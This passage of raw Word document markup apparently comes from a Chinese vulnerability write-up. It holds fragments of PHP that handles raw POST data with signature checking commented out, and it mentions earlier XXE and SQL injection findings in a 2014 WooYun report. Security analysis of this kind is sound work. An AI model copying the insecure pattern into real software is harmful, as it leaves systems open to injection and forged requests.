            <v:rect id="_x0000_s1472" style="position:absolute;left:1008;top:577;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1471" style="position:absolute;left:1108;top:577;width:912;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1470" style="position:absolute;left:2020;top:577;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1469" style="position:absolute" from="5,513" to="5,839" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1468" style="position:absolute" from="6755,513" to="6755,839" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1467" style="position:absolute;left:8;top:839;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1466" style="position:absolute;left:188;top:903;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1465" style="position:absolute;left:308;top:903;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1464" style="position:absolute;left:408;top:903;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1463" style="position:absolute;left:508;top:903;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1462" style="position:absolute;left:608;top:903;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1461" style="position:absolute;left:708;top:903;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1460" style="position:absolute;left:808;top:903;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1459" style="position:absolute;left:908;top:903;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1458" style="position:absolute;left:1008;top:903;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1457" style="position:absolute;left:1108;top:903;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1456" style="position:absolute" from="5,839" to="5,1165" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1455" style="position:absolute" from="6755,839" to="6755,1165" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1454" style="position:absolute;left:8;top:1166;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1453" style="position:absolute;left:188;top:1228;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1452" style="position:absolute;left:308;top:1228;width:796;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1451" style="position:absolute;left:1104;top:1228;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1450" style="position:absolute;left:2020;top:1228;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1449" style="position:absolute;left:2261;top:1228;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1448" style="position:absolute;left:2381;top:1228;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1447" style="position:absolute" from="5,1166" to="5,1492" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1446" style="position:absolute" from="6755,1166" to="6755,1492" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1445" style="position:absolute;left:8;top:1491;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1444" style="position:absolute;left:188;top:1554;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1443" style="position:absolute;left:308;top:1554;width:796;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1442" style="position:absolute;left:1104;top:1554;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1441" style="position:absolute;left:2020;top:1554;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1440" style="position:absolute;left:2261;top:1554;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1439" style="position:absolute;left:2381;top:1554;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1438" style="position:absolute" from="5,1491" to="5,1817" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1437" style="position:absolute" from="6755,1491" to="6755,1817" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1436" style="position:absolute;left:8;top:1818;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1435" style="position:absolute;left:188;top:1881;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1434" style="position:absolute;left:308;top:1881;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1433" style="position:absolute;left:408;top:1881;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1432" style="position:absolute;left:508;top:1881;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1431" style="position:absolute;left:749;top:1881;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1430" style="position:absolute;left:849;top:1881;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1429" style="position:absolute;left:949;top:1881;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1428" style="position:absolute;left:1049;top:1881;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1427" style="position:absolute;left:1149;top:1881;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1426" style="position:absolute;left:1249;top:1881;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1425" style="position:absolute;left:1349;top:1881;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1424" style="position:absolute;left:1449;top:1881;width:571;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1423" style="position:absolute;left:2020;top:1881;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1422" style="position:absolute" from="5,1818" to="5,2143" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1421" style="position:absolute" from="6755,1818" to="6755,2143" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1420" style="position:absolute;left:8;top:2144;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1419" style="position:absolute;left:188;top:2206;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1418" style="position:absolute;left:308;top:2206;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1417" style="position:absolute;left:408;top:2206;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1416" style="position:absolute;left:508;top:2206;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1415" style="position:absolute;left:749;top:2206;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1414" style="position:absolute;left:849;top:2206;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1413" style="position:absolute;left:949;top:2206;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1412" style="position:absolute;left:1049;top:2206;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1411" style="position:absolute;left:1149;top:2206;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1410" style="position:absolute;left:1249;top:2206;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1409" style="position:absolute;left:1349;top:2206;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1408" style="position:absolute;left:1449;top:2206;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1407" style="position:absolute" from="5,2144" to="5,2470" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1406" style="position:absolute" from="6755,2144" to="6755,2470" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1405" style="position:absolute;left:8;top:2469;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1404" style="position:absolute;left:188;top:2533;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1403" style="position:absolute;left:288;top:2533;width:816;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1402" style="position:absolute;left:1104;top:2533;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1401" style="position:absolute;left:2020;top:2533;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1400" style="position:absolute;left:2984;top:2533;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1399" style="position:absolute;left:3104;top:2533;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1398" style="position:absolute;left:3225;top:2533;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1397" style="position:absolute" from="5,2469" to="5,2795" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1396" style="position:absolute" from="6755,2469" to="6755,2795" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1395" style="position:absolute;left:8;top:2795;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1394" style="position:absolute;left:188;top:2859;width:5181;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1393" style="position:absolute" from="5,2795" to="5,3121" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1392" style="position:absolute" from="6755,2795" to="6755,3121" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1391" style="position:absolute;left:8;top:3121;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1390" style="position:absolute;left:188;top:3185;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1389" style="position:absolute;left:288;top:3185;width:816;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1388" style="position:absolute;left:1104;top:3185;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1387" style="position:absolute;left:2020;top:3185;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1386" style="position:absolute;left:2261;top:3185;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1385" style="position:absolute;left:2381;top:3185;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1384" style="position:absolute" from="5,3121" to="5,3447" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1383" style="position:absolute" from="6755,3121" to="6755,3447" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1382" style="position:absolute;left:8;top:3448;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1381" style="position:absolute;left:188;top:3510;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1380" style="position:absolute;left:288;top:3510;width:816;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1379" style="position:absolute;left:1104;top:3510;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1378" style="position:absolute;left:2020;top:3510;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1377" style="position:absolute" from="3,3956" to="6757,3956" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1376" style="position:absolute" from="5,3448" to="5,3958" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1375" style="position:absolute" from="6755,3448" to="6755,3958" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s1374" type="#_x0000_t202" style="position:absolute;left:189;top:252;width:120;height:2155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-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-</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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-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+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+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+</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="200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+</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1373" type="#_x0000_t202" style="position:absolute;left:2020;top:252;width:843;height:526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 w:line="200" w:lineRule="exact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);</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1372" type="#_x0000_t202" style="position:absolute;left:1108;top:902;width:120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371" type="#_x0000_t202" style="position:absolute;left:508;top:1882;width:240;height:526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right="-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//</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="200" w:lineRule="exact"/>
                      <w:ind w:right="-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>//</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1370" type="#_x0000_t202" style="position:absolute;left:2020;top:1229;width:3732;height:852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right="-1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color w:val="333333"/>
                        <w:spacing w:val="-13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!$this-&gt;checkSignature())</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="6" w:line="320" w:lineRule="atLeast"/>
                      <w:ind w:right="246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//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 xml:space="preserve">{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exit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();</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1369" type="#_x0000_t202" style="position:absolute;left:1449;top:2208;width:120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v:shape id="_x0000_s1368" type="#_x0000_t202" style="position:absolute;left:189;top:2534;width:5179;height:1176" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="388" w:lineRule="auto"/>
                      <w:ind w:firstLine="183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$postStr = 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addslashes(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$GLOBALS["HTTP_RAW_POST_DATA"]);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="2"/>
                      <w:ind w:left="183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if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(!empty($postStr))</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="200" w:lineRule="exact"/>
                      <w:ind w:right="1394"/>
                      <w:jc w:val="center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80020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="232" w:lineRule="exact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t>注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>释调</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-65"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>checkSignature()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>啥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>？？？？？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="464"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">http://**.**.**.**/bugs/wooyun-2014-075009 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>曾</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>里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的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-55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XXE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-52"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQLI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，不</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，被次利用的是另外两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-55"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BUG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="25"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s1213" style="position:absolute;left:0;text-align:left;margin-left:80.45pt;margin-top:16.1pt;width:338pt;height:278.95pt;z-index:9160;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1609,322" coordsize="6760,5579">
            <v:rect id="_x0000_s1366" style="position:absolute;left:1617;top:330;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1365" style="position:absolute;left:1797;top:573;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1364" style="position:absolute;left:2399;top:573;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1363" style="position:absolute;left:2520;top:573;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1362" style="position:absolute;left:5050;top:573;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1361" style="position:absolute;left:5171;top:573;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1360" style="position:absolute;left:6014;top:573;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1359" style="position:absolute;left:6135;top:573;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1358" style="position:absolute" from="1612,327" to="8366,327" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1357" style="position:absolute" from="1614,325" to="1614,836" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1356" style="position:absolute" from="8364,329" to="8364,836" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1355" style="position:absolute;left:1617;top:836;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1354" style="position:absolute;left:1797;top:899;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1353" style="position:absolute" from="1614,836" to="1614,1162" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1352" style="position:absolute" from="8364,836" to="8364,1162" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1351" style="position:absolute;left:1617;top:1162;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1350" style="position:absolute;left:1797;top:1225;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1349" style="position:absolute;left:2713;top:1225;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1348" style="position:absolute;left:3436;top:1225;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1347" style="position:absolute;left:3556;top:1225;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1346" style="position:absolute;left:4520;top:1225;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1345" style="position:absolute;left:4641;top:1225;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1344" style="position:absolute" from="1614,1162" to="1614,1488" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1343" style="position:absolute" from="8364,1162" to="8364,1488" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1342" style="position:absolute;left:1617;top:1488;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1341" type="#_x0000_t75" style="position:absolute;left:1797;top:1551;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:line id="_x0000_s1340" style="position:absolute" from="1614,1488" to="1614,1814" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1339" style="position:absolute" from="8364,1488" to="8364,1814" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1338" style="position:absolute;left:1617;top:1814;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1337" style="position:absolute;left:1797;top:1877;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1336" style="position:absolute;left:1897;top:1877;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1335" style="position:absolute;left:1997;top:1877;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1334" style="position:absolute;left:2097;top:1877;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1333" style="position:absolute;left:2197;top:1877;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1332" style="position:absolute;left:2297;top:1877;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1331" style="position:absolute;left:2397;top:1877;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1330" style="position:absolute;left:2497;top:1877;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1329" style="position:absolute;left:2597;top:1877;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1328" style="position:absolute;left:3561;top:1877;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1327" style="position:absolute;left:3681;top:1877;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1326" style="position:absolute;left:3802;top:1877;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1325" style="position:absolute;left:3922;top:1877;width:2049;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1324" style="position:absolute" from="1614,1814" to="1614,2140" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1323" style="position:absolute" from="8364,1814" to="8364,2140" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1322" style="position:absolute;left:1617;top:2140;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1321" style="position:absolute;left:1797;top:2203;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1320" style="position:absolute;left:1897;top:2203;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1319" style="position:absolute;left:1997;top:2203;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1318" style="position:absolute;left:2097;top:2203;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
